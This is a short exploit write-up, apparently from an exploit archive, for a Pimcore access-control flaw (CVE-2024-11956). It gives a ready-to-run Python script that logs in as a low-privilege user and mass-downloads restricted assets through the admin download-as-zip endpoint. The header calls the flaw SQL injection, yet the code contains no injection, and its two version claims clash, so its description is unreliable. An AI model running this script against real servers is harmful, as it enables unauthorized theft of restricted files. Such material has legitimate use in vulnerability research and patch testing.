# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956
import requests
# Replace with target URL and credentials
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"
# Authenticate and get session
session = requests.Session()
login_data = {
"username": USERNAME,
"password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)
if "Login successful" in login_response.text:
print("[+] Authenticated successfully.")
# Exploit the downloadAsZip functionality
download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
payload = {
"ids[]": ["1", "2", "3"] # Replace with IDs of restricted files/folders
}
download_response = session.post(download_url, data=payload)
if download_response.status_code == 200:
print("[+] Exploit successful. Restricted files downloaded.")
with open("restricted_files.zip", "wb") as f:
f.write(download_response.content)
else:
print("[-] Exploit failed. Server returned:", download_response.status_code)
else:
print("[-] Authentication failed.")